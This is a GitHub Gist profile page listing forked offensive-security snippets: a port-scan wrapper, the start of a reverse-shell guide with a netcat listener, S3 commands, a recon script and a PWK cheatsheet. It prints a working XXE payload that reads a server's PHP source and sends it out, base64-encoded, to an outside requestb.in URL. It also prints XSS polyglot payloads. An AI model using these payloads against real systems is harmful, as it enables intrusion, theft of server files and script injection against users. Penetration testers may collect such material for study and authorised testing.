Skip to content

Instantly share code, notes, and snippets.

View prosecurity's full-sized avatar

prosecurity

28 followers · 209 following
View GitHub Profile
@prosecurity
prosecurity / mass-scan.sh
Created September 9, 2019 17:55 — forked from random-robbie/mass-scan.sh
mass-scan
#!/bin/bash
strip=$(echo $1|sed 's/https\?:\/\///')
echo ""
echo "######################################"
echo $strip
echo "######################################"
echo ""
massscan -p1-65535 $(dig +short $strip|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1) --max-rate 1000 |& tee $strip_scan
@prosecurity
prosecurity / reverseshell.md
Created September 9, 2019 17:53 — forked from random-robbie/reverseshell.md

How to get reverse shell

Setup a listener on your VPS to connect back to

nc -lvp 4444
@prosecurity
prosecurity / s3-commands.md
Created September 9, 2019 17:52 — forked from random-robbie/s3-commands.md

Some S3 Commands

// Copy MyFile.txt in current directory to s3://my-bucket/path
$ aws s3 cp MyFile.txt s3://my-bucket/path/

// Move all .jpg files in s3://my-bucket/path to ./MyDirectory
$ aws s3 mv s3://my-bucket/path ./MyDirectory --exclude '*' --include '*.jpg' --recursive
@prosecurity
prosecurity / s3-pwn.md
Created September 9, 2019 17:52 — forked from random-robbie/s3-pwn.md

If you are reading this then there is a chance you have a poc.txt in your s3 bucket.

This is just a little heads up to say attackers can upload and overwrite files in your s3 bucket and if you are serving up files like JS they can add an XSS or coinhive to your js.

If you login to your AWS console find the bucket please remove the public-write permission from the bucket and this will fix the issue.

How to test a s3 bucket for bad permissions

@prosecurity
prosecurity / master_script.sh
Created September 4, 2019 11:57 — forked from LuD1161/master_script.sh
Master Script to automate all the recon
#!/bin/bash
if [ -z "$2" ]
then
echo "2nd Argument not supplied"
echo "2nd argument can be basic or advanced,it used for nmap"
echo "Usage : ./master_script.sh domain basic|advanced"
exit 1
fi
@prosecurity
prosecurity / secret_book.md
Created July 19, 2019 22:56 — forked from dwallraff/secret_book.md
Secret Book of Knowledge - from https://github.com/trimstray/the-book-of-secret-knowledge credit: @trimstray

Master

"Knowledge is powerful, be careful how you use it!"

A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more.

@prosecurity
prosecurity / evil.xml
Created July 19, 2019 22:47 — forked from gattacker/evil.xml
<!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/index.php">
<!ENTITY % param1 "<!ENTITY external SYSTEM 'https://requestb.in/141gy131?log=%payload;'>">
@prosecurity
prosecurity / evil.js
Created July 19, 2019 22:46 — forked from gattacker/evil.js
<script>document.write('123')</script>
@prosecurity
prosecurity / evil1.js
Created July 19, 2019 22:45 — forked from gattacker/evil1.js
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
@prosecurity
prosecurity / pwk-cheatsheet.md
Created July 19, 2019 22:41
Removed PWK Cheatsheet by sergey-pronin

PWK-CheatSheet

██▓███ █ ███ ▄█▀ ▄████▄ ██░ ██▓█████▄▄▄ ▄▄▄█████▓ ██████ ██░ ██▓█████▓████▄▄▄█████▓ ▓██░ ██▓█░ █ ░███▄█▒ ▒██▀ ▀█ ▓██░ ██▓█ ▒████▄ ▓ ██▒ ▓▒ ▒██ ▒▓██░ ██▓█ ▀▓█ ▓ ██▒ ▓▒ ▓██░ ██▓▒█░ █ ░▓███▄░ ▒▓█ ▄▒██▀▀██▒███ ▒██ ▀█▄▒ ▓██░ ▒░ ░ ▓██▄ ▒██▀▀██▒███ ▒███ ▒ ▓██░ ▒░ ▒██▄█▓▒ ░█░ █ ░▓██ █▄ ▒▓▓▄ ▄██░▓█ ░██▒▓█ ░██▄▄▄▄█░ ▓██▓ ░ ▒ ██░▓█ ░██▒▓█ ▄▒▓█ ░ ▓██▓ ░ ▒██▒ ░ ░░██▒██▒██▒ █▄ ▒ ▓███▀ ░▓█▒░██░▒████▓█ ▓██▒▒██▒ ░ ▒██████▒░▓█▒░██░▒████░▒████▒▒██▒ ░ ▒▓▒░ ░ ░ ▓░▒ ▒▒ ▒▒ ▓▒ ░ ░▒ ▒ ░▒ ░░▒░░░ ▒░ ▒▒ ▓▒█░▒ ░░ ▒ ▒▓▒ ▒ ░▒ ░░▒░░░ ▒░ ░░ ▒░ ░▒ ░░
░▒ ░ ▒ ░ ░░ ░▒ ▒░ ░ ▒ ▒ ░▒░ ░░ ░ ░▒ ▒▒ ░ ░ ░ ░▒ ░ ░▒ ░▒░ ░░ ░ ░░ ░ ░ ░